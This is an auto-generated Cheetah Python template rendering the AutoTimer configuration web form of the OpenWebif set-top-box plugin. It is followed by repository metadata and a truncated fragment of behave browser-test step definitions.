\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="counter">''')
_v = VFFSL(SL,"tstrings",True)['at_max_counter'] # u"$tstrings['at_max_counter']" on line 115, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_max_counter']")) # from line 115, col 34.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="counter" id="counter">
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<span id="CounterE">
\t\t\t\t\t\t\t\t<label for="left">''')
_v = VFFSL(SL,"tstrings",True)['at_left'] # u"$tstrings['at_left']" on line 119, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_left']")) # from line 119, col 27.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="left" id="left">
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<label for="counterFormat">''')
_v = VFFSL(SL,"tstrings",True)['at_reset_count'] # u"$tstrings['at_reset_count']" on line 122, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_reset_count']")) # from line 122, col 36.
write(u''':</label>
\t\t\t\t\t\t\t\t<select id="counterFormat" name="counterFormat" size="1">
\t\t\t\t\t\t\t\t<option value="" selected>''')
_v = VFFSL(SL,"tstrings",True)['at_never'] # u"$tstrings['at_never']" on line 124, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_never']")) # from line 124, col 35.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="%m">''')
_v = VFFSL(SL,"tstrings",True)['at_monthly'] # u"$tstrings['at_monthly']" on line 125, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_monthly']")) # from line 125, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="%U">''')
_v = VFFSL(SL,"tstrings",True)['at_weekly_sun'] # u"$tstrings['at_weekly_sun']" on line 126, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_weekly_sun']")) # from line 126, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="%W">''')
_v = VFFSL(SL,"tstrings",True)['at_weekly_mon'] # u"$tstrings['at_weekly_mon']" on line 127, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_weekly_mon']")) # from line 127, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="avoidDuplicateDescription">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup'] # u"$tstrings['at_avoid_dup']" on line 131, col 52
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup']")) # from line 131, col 52.
write(u''':</label>
\t\t\t\t\t\t\t\t<select name="avoidDuplicateDescription" id="avoidDuplicateDescription">
\t\t\t\t\t\t\t\t<option value="0" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_no'] # u"$tstrings['at_avoid_dup_no']" on line 133, col 47
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_no']")) # from line 133, col 47.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="1">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_same_service'] # u"$tstrings['at_avoid_dup_same_service']" on line 134, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_same_service']")) # from line 134, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="2">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_any_service'] # u"$tstrings['at_avoid_dup_any_service']" on line 135, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_any_service']")) # from line 135, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t<option value="3">''')
_v = VFFSL(SL,"tstrings",True)['at_avoid_dup_any_service_rec'] # u"$tstrings['at_avoid_dup_any_service_rec']" on line 136, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_avoid_dup_any_service_rec']")) # from line 136, col 27.
write(u'''</option>
\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t<br><label for="Location">''')
_v = VFFSL(SL,"tstrings",True)['at_location'] # u"$tstrings['at_location']" on line 138, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_location']")) # from line 138, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<input type="checkbox" name="Location" id="Location" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="LocationE">
\t\t\t\t\t\t\t\t\t<label for="location"></label>
\t\t\t\t\t\t\t\t\t<select name="location" id="location">
''')
for location in VFFSL(SL,"locations",True): # generated from line 144, col 11
write(u'''\t\t\t\t\t\t\t\t\t\t\t<option value="''')
_v = VFFSL(SL,"location",True) # u'$location' on line 145, col 27
if _v is not None: write(_filter(_v, rawExpr=u'$location')) # from line 145, col 27.
write(u'''">''')
_v = VFFSL(SL,"location",True) # u'$location' on line 145, col 38
if _v is not None: write(_filter(_v, rawExpr=u'$location')) # from line 145, col 38.
write(u'''</option>
''')
write(u'''\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t\t
\t\t\t\t\t\t\t\t<br><label for="Tags">''')
_v = VFFSL(SL,"tstrings",True)['at_tags'] # u"$tstrings['at_tags']" on line 150, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_tags']")) # from line 150, col 31.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<span id="TagsE">
\t\t\t\t\t\t\t\t\t<select data-placeholder="''')
_v = VFFSL(SL,"tstrings",True)['at_select_tags'] # u"$tstrings['at_select_tags']" on line 152, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_select_tags']")) # from line 152, col 36.
write(u'''" name="tags" id="tags" class="tags_select_box" multiple tabindex="16">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="Bouquets">''')
_v = VFFSL(SL,"tstrings",True)['at_bouquets'] # u"$tstrings['at_bouquets']" on line 155, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_bouquets']")) # from line 155, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="Bouquets" id="Bouquets" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="BouquetsE">
\t\t\t\t\t\t\t\t\t<select data-placeholder="''')
_v = VFFSL(SL,"tstrings",True)['at_select_bouquets'] # u"$tstrings['at_select_bouquets']" on line 158, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_select_bouquets']")) # from line 158, col 36.
write(u'''" name="bouquets" id="bouquets" class="bq_select_box" multiple tabindex="16">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br><label for="Channels">''')
_v = VFFSL(SL,"tstrings",True)['at_channels'] # u"$tstrings['at_channels']" on line 161, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_channels']")) # from line 161, col 35.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="Channels" id="Channels" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="ChannelsE">
\t\t\t\t\t\t\t\t\t<select data-placeholder="''')
_v = VFFSL(SL,"tstrings",True)['at_select_channels'] # u"$tstrings['at_select_channels']" on line 164, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_select_channels']")) # from line 164, col 36.
write(u'''" name="channels" id="channels" class="ch_select_box" multiple tabindex="16">
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t<br>
\t\t\t\t\t\t\t\t<br>
\t\t\t\t\t\t\t\t<div>
\t\t\t\t\t\t\t\t<label for="Filter">''')
_v = VFFSL(SL,"tstrings",True)['at_filter'] # u"$tstrings['at_filter']" on line 170, col 29
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter']")) # from line 170, col 29.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="Filter" id="Filter" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t\t<span id="FilterE" style="display:inline-table">
\t\t\t\t\t\t\t\t\t<input type="button" id="AddFilter" value="''')
_v = VFFSL(SL,"tstrings",True)['at_add'] # u"$tstrings['at_add']" on line 173, col 53
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_add']")) # from line 173, col 53.
write(u'''"/>
\t\t\t\t\t\t\t\t\t<table id="filterlist">
\t\t\t\t\t\t\t\t\t<tr id="dummyfilter" style="display:none">
\t\t\t\t\t\t\t\t\t<td class="nopadding">
\t\t\t\t\t\t\t\t\t<select size="1" class="FT">
\t\t\t\t\t\t\t\t\t<option value="include" selected="">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_include'] # u"$tstrings['at_filter_include']" on line 178, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_include']")) # from line 178, col 46.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="exclude">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_exclude'] # u"$tstrings['at_filter_exclude']" on line 179, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_exclude']")) # from line 179, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t\t\t<td class="nopadding">
\t\t\t\t\t\t\t\t\t<select size="1" class="FM">
\t\t\t\t\t\t\t\t\t<option value="title" selected="">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_title'] # u"$tstrings['at_filter_title']" on line 184, col 44
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_title']")) # from line 184, col 44.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="shortdescription">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_short_desc'] # u"$tstrings['at_filter_short_desc']" on line 185, col 43
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_short_desc']")) # from line 185, col 43.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="description">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_desc'] # u"$tstrings['at_filter_desc']" on line 186, col 38
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_desc']")) # from line 186, col 38.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="dayofweek">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_day'] # u"$tstrings['at_filter_day']" on line 187, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_day']")) # from line 187, col 36.
write(u'''</option>
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t\t\t<td class="nopadding">
\t\t\t\t\t\t\t\t\t<input type="text" class="FI" size="20" value="" style="display: block;">
\t\t\t\t\t\t\t\t\t<select size="1" class="FS" style="display: none;">
\t\t\t\t\t\t\t\t\t<option value="0" selected="">''')
_v = VFFSL(SL,"tstrings",True)['monday'] # u"$tstrings['monday']" on line 193, col 40
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['monday']")) # from line 193, col 40.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="1">''')
_v = VFFSL(SL,"tstrings",True)['tuesday'] # u"$tstrings['tuesday']" on line 194, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['tuesday']")) # from line 194, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="2">''')
_v = VFFSL(SL,"tstrings",True)['wednesday'] # u"$tstrings['wednesday']" on line 195, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['wednesday']")) # from line 195, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="3">''')
_v = VFFSL(SL,"tstrings",True)['thursday'] # u"$tstrings['thursday']" on line 196, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['thursday']")) # from line 196, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="4">''')
_v = VFFSL(SL,"tstrings",True)['friday'] # u"$tstrings['friday']" on line 197, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['friday']")) # from line 197, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="5">''')
_v = VFFSL(SL,"tstrings",True)['saturday'] # u"$tstrings['saturday']" on line 198, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['saturday']")) # from line 198, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="6">''')
_v = VFFSL(SL,"tstrings",True)['sunday'] # u"$tstrings['sunday']" on line 199, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['sunday']")) # from line 199, col 28.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="weekend">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_weekend'] # u"$tstrings['at_filter_weekend']" on line 200, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_weekend']")) # from line 200, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t\t<option value="weekday">''')
_v = VFFSL(SL,"tstrings",True)['at_filter_weekday'] # u"$tstrings['at_filter_weekday']" on line 201, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_filter_weekday']")) # from line 201, col 34.
write(u'''</option>
\t\t\t\t\t\t\t\t\t</select>
\t\t\t\t\t\t\t\t\t</td>
\t\t\t\t\t\t\t\t\t<td><input type="checkbox" name="RemoveFilter" id="RemoveFilterID" value="" class="FR checkbox"> ''')
_v = VFFSL(SL,"tstrings",True)['at_del'] # u"$tstrings['at_del']" on line 204, col 107
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_del']")) # from line 204, col 107.
write(u'''</td>
\t\t\t\t\t\t\t\t\t</tr>
\t\t\t\t\t\t\t\t\t</table>
\t\t\t\t\t\t\t\t\t</span>
\t\t\t\t\t\t\t\t</div>
\t\t\t\t\t\t\t\t
''')
if VFFSL(SL,"hasVPS",True) == 1: # generated from line 210, col 9
write(u'''\t\t\t\t\t\t\t\t<br><label for="vps">''')
_v = VFFSL(SL,"tstrings",True)['vps'] # u"$tstrings['vps']" on line 211, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['vps']")) # from line 211, col 30.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="vps" id="vps" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t<span id="vpsE">
\t\t\t\t\t\t\t\t<label for="vpssm">''')
_v = VFFSL(SL,"tstrings",True)['safe_mode'] # u"$tstrings['safe_mode']" on line 214, col 28
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['safe_mode']")) # from line 214, col 28.
write(u''':</label>
\t\t\t\t\t\t\t\t\t<input type="checkbox" name="vpssm" id="vpssm" value="" class="checkbox ui-widget-content ui-corner-all">
\t\t\t\t\t\t\t\t</span>
''')
if VFFSL(SL,"hasSeriesPlugin",True) == 1: # generated from line 218, col 9
write(u'''\t\t\t\t\t\t\t\t<br><label for="seriesplugin">''')
_v = VFFSL(SL,"tstrings",True)['at_label_series'] # u"$tstrings['at_label_series']" on line 219, col 39
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_label_series']")) # from line 219, col 39.
write(u''':</label>
\t\t\t\t\t\t\t\t<input type="checkbox" name="series_labeling" id="series_labeling" value="" class="checkbox ui-widget-content ui-corner-all">
''')
write(u'''\t\t\t\t\t\t\t</fieldset>
\t\t\t\t\t\t</form>
\t\t\t\t\t\t
\t\t\t\t\t\t<div class="ui-dialog-buttonpane ui-widget-content ui-helper-clearfix">
\t\t\t\t\t\t<div id="actions">
\t\t\t\t\t\t<button id="atbutton0">''')
_v = VFFSL(SL,"tstrings",True)['at_add'] # u"$tstrings['at_add']" on line 227, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_add']")) # from line 227, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton1">''')
_v = VFFSL(SL,"tstrings",True)['at_del'] # u"$tstrings['at_del']" on line 228, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_del']")) # from line 228, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton2">''')
_v = VFFSL(SL,"tstrings",True)['at_reload'] # u"$tstrings['at_reload']" on line 229, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_reload']")) # from line 229, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton3">''')
_v = VFFSL(SL,"tstrings",True)['at_save'] # u"$tstrings['at_save']" on line 230, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_save']")) # from line 230, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton4">''')
_v = VFFSL(SL,"tstrings",True)['at_parse'] # u"$tstrings['at_parse']" on line 231, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_parse']")) # from line 231, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton5">''')
_v = VFFSL(SL,"tstrings",True)['at_simulate'] # u"$tstrings['at_simulate']" on line 232, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_simulate']")) # from line 232, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton6">''')
_v = VFFSL(SL,"tstrings",True)['at_timers'] # u"$tstrings['at_timers']" on line 233, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_timers']")) # from line 233, col 30.
write(u'''</button>
\t\t\t\t\t\t<button id="atbutton7">''')
_v = VFFSL(SL,"tstrings",True)['at_settings'] # u"$tstrings['at_settings']" on line 234, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['at_settings']")) # from line 234, col 30.
write(u'''</button>
\t\t\t\t\t\t</div></div>
\t\t\t\t\t\t<div id="errorbox" class="timerlist_row" style="color: red;">
\t\t<div class="ui-state-error ui-corner-all" style="padding: 0 .7em;">
\t\t\t<p><span class="ui-icon ui-icon-alert" style="float: left; margin-right: .3em;"></span>
\t\t\t<span id="error"></span>
\t\t\t<span id="success" style="color: green;"></span>
\t\t</div>
\t</div>
\t\t<span style="display: block;clear: both;"/>
\t\t</div>
\t\t</div>
\t</div>
\t</div>
\t</div>
</div>
<div id="simdlg" style="display:none;">
<div style="font-size:smaller;">
<table id="simt" border="0" class="ui-widget" style="margin:3px;width:100%;">
<thead class="ui-widget-header">
<tr><th>''')
_v = VFFSL(SL,"tstrings",True)['name'] # u"$tstrings['name']" on line 254, col 9
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['name']")) # from line 254, col 9.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['title'] # u"$tstrings['title']" on line 254, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['title']")) # from line 254, col 35.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['channel'] # u"$tstrings['channel']" on line 254, col 62
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['channel']")) # from line 254, col 62.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['start'] # u"$tstrings['start']" on line 254, col 91
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['start']")) # from line 254, col 91.
write(u'''</th><th>''')
_v = VFFSL(SL,"tstrings",True)['end'] # u"$tstrings['end']" on line 254, col 118
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['end']")) # from line 254, col 118.
write(u'''</th></tr>
</thead>
<tbody id=\'simtb\' class="ui-widget-content">
</tbody>
</table>
</div>
</div>
<div id="timerdlg" style="display:none;">
<div id="timerdlgcont">
</div>
<div>
<div id="atsettingdlg" style="display:none;">
<div id="atsettingdlgcont">
<form>
<fieldset>
<label for="ats_autopoll">''')
_v = VFFSL(SL,"tstrings",True)['ats_autopoll'] # u"$tstrings['ats_autopoll']" on line 271, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_autopoll']")) # from line 271, col 27.
write(u''':</label>
<input type="checkbox" name="ats_autopoll" id="ats_autopoll" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_interval">''')
_v = VFFSL(SL,"tstrings",True)['ats_interval'] # u"$tstrings['ats_interval']" on line 273, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_interval']")) # from line 273, col 27.
write(u''':</label>
<input type="text" size="5" name="ats_interval" id="ats_interval" class="text ui-widget-content ui-corner-all">
<label for="ats_maxdaysinfuture">''')
_v = VFFSL(SL,"tstrings",True)['ats_maxdaysinfuture'] # u"$tstrings['ats_maxdaysinfuture']" on line 275, col 34
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_maxdaysinfuture']")) # from line 275, col 34.
write(u''':</label>
<input type="text" size="5" name="ats_maxdaysinfuture" id="ats_maxdaysinfuture" class="text ui-widget-content ui-corner-all">
<br><label for="ats_try_guessing">''')
_v = VFFSL(SL,"tstrings",True)['ats_try_guessing'] # u"$tstrings['ats_try_guessing']" on line 277, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_try_guessing']")) # from line 277, col 35.
write(u''':</label>
<input type="checkbox" name="ats_try_guessing" id="ats_try_guessing" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_fastscan">''')
_v = VFFSL(SL,"tstrings",True)['ats_fastscan'] # u"$tstrings['ats_fastscan']" on line 279, col 27
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_fastscan']")) # from line 279, col 27.
write(u''':</label>
<input type="checkbox" name="ats_fastscan" id="ats_fastscan" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_show_in_extensionsmenu">''')
_v = VFFSL(SL,"tstrings",True)['ats_show_in_extensionsmenu'] # u"$tstrings['ats_show_in_extensionsmenu']" on line 281, col 41
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_show_in_extensionsmenu']")) # from line 281, col 41.
write(u''':</label>
<input type="checkbox" name="ats_show_in_extensionsmenu" id="ats_show_in_extensionsmenu" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_disabled_on_conflict">''')
_v = VFFSL(SL,"tstrings",True)['ats_disabled_on_conflict'] # u"$tstrings['ats_disabled_on_conflict']" on line 283, col 43
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_disabled_on_conflict']")) # from line 283, col 43.
write(u''':</label>
<input type="checkbox" name="ats_disabled_on_conflict" id="ats_disabled_on_conflict" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_addsimilar_on_conflict">''')
_v = VFFSL(SL,"tstrings",True)['ats_addsimilar_on_conflict'] # u"$tstrings['ats_addsimilar_on_conflict']" on line 285, col 41
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_addsimilar_on_conflict']")) # from line 285, col 41.
write(u''':</label>
<input type="checkbox" name="ats_addsimilar_on_conflict" id="ats_addsimilar_on_conflict" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_notifconflict">''')
_v = VFFSL(SL,"tstrings",True)['ats_notifconflict'] # u"$tstrings['ats_notifconflict']" on line 287, col 36
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_notifconflict']")) # from line 287, col 36.
write(u''':</label>
<input type="checkbox" name="ats_notifconflict" id="ats_notifconflict" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_notifsimilar">''')
_v = VFFSL(SL,"tstrings",True)['ats_notifsimilar'] # u"$tstrings['ats_notifsimilar']" on line 289, col 31
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_notifsimilar']")) # from line 289, col 31.
write(u''':</label>
<input type="checkbox" name="ats_notifsimilar" id="ats_notifsimilar" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_add_autotimer_to_tags">''')
_v = VFFSL(SL,"tstrings",True)['ats_add_autotimer_to_tags'] # u"$tstrings['ats_add_autotimer_to_tags']" on line 291, col 44
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_add_autotimer_to_tags']")) # from line 291, col 44.
write(u''':</label>
<input type="checkbox" name="ats_add_autotimer_to_tags" id="ats_add_autotimer_to_tags" value="" class="checkbox ui-widget-content ui-corner-all">
<label for="ats_add_name_to_tags">''')
_v = VFFSL(SL,"tstrings",True)['ats_add_name_to_tags'] # u"$tstrings['ats_add_name_to_tags']" on line 293, col 35
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_add_name_to_tags']")) # from line 293, col 35.
write(u''':</label>
<input type="checkbox" name="ats_add_name_to_tags" id="ats_add_name_to_tags" value="" class="checkbox ui-widget-content ui-corner-all">
<br><label for="ats_refresh">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh'] # u"$tstrings['ats_refresh']" on line 296, col 30
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh']")) # from line 296, col 30.
write(u''':</label>
<select id="ats_refresh" name="ats_refresh" size="1">
\t\t\t\t<option value="none" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh_none'] # u"$tstrings['ats_refresh_none']" on line 298, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh_none']")) # from line 298, col 46.
write(u'''</option>
\t\t\t\t<option value="auto" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh_auto'] # u"$tstrings['ats_refresh_auto']" on line 299, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh_auto']")) # from line 299, col 46.
write(u'''</option>
\t\t\t\t<option value="all" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_refresh_all'] # u"$tstrings['ats_refresh_all']" on line 300, col 45
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_refresh_all']")) # from line 300, col 45.
write(u'''</option>
</select>
<label for="ats_editor">''')
_v = VFFSL(SL,"tstrings",True)['ats_editor'] # u"$tstrings['ats_editor']" on line 303, col 25
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_editor']")) # from line 303, col 25.
write(u'''</label>
<select id="ats_editor" name="ats_editor" size="1">
\t\t\t<option value="plain" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_editor_plain'] # u"$tstrings['ats_editor_plain']" on line 305, col 46
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_editor_plain']")) # from line 305, col 46.
write(u'''</option>
\t\t\t<option value="wizzard" selected="selected">''')
_v = VFFSL(SL,"tstrings",True)['ats_editor_wizzard'] # u"$tstrings['ats_editor_wizzard']" on line 306, col 48
if _v is not None: write(_filter(_v, rawExpr=u"$tstrings['ats_editor_wizzard']")) # from line 306, col 48.
write(u'''</option>
</select>
</fieldset>
</form>
</div>
<div>
<script type="text/javascript" src="/js/jquery-ui-timepicker-addon.min.js"></script>
<script type="text/javascript" src="/js/chosen.jquery.min.js"></script>
<script type="text/javascript" src="/js/at.js"></script>
<script type="text/javascript">
$(function() { InitPage();});
</script>
<link rel="stylesheet" type="text/css" href="/css/chosen.min.css" />
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_54425158
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_at= 'respond'
## END CLASS DEFINITION
# Attach Cheetah's runtime plumbing (generated helper methods) to the
# template class exactly once; the marker attribute guards re-entry.
if not hasattr(at, '_initCheetahAttributes'):
    templateAPIClass = getattr(at, '_CHEETAH_templateClass', Template)
    templateAPIClass._addCheetahPlumbingCodeToClass(at)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
    from Cheetah.TemplateCmdLineIface import CmdLineIface
    CmdLineIface(templateObj=at()).run()
|
MOA-2011/e2openplugin-OpenWebif
|
plugin/controllers/views/ajax/at.py
|
Python
|
gpl-2.0
| 47,524
|
[
"VisIt"
] |
1bafb8f35bdebf278aad86ccaca1f4359163cfd0309a5e91b42299f886631204
|
import time
from urlparse import urljoin
from behave import use_step_matcher, given, then
use_step_matcher("re")
@given('I am on (?:the )?page with relative url "(?P<url>.*)"')
def step_impl(context, url):
    """Point the browser at the server URL joined with the relative *url*."""
    destination = urljoin(context.config.server_url, url)
    context.browser.visit(destination)
@then('I should (?P<not_>not )?be on (?:the )?page with relative url "(?P<url>.*)"')
def step_impl(context, not_, url):
    """Assert the browser's current URL matches (or does not match) *url*."""
    # Give navigation a moment to settle before reading the URL.
    time.sleep(1)
    expected = urljoin(context.config.server_url, url)
    actual = context.browser.url
    if not_:
        assert actual != expected, "Expected not to be on page %s, instead got %s" % (
            expected, actual)
    else:
        assert actual == expected, "Expected to be on page %s, instead got %s" % (
            expected, actual)
@given('a (?P<super_>super )?user with username "(?P<username>.*)" and password "(?P<password>.*)"')
def step_impl(context, super_, username, password):
    """Create a user (or superuser) for the scenario.

    ``super_`` is the optional "super " capture group: truthy when the
    step text says "a super user".
    """
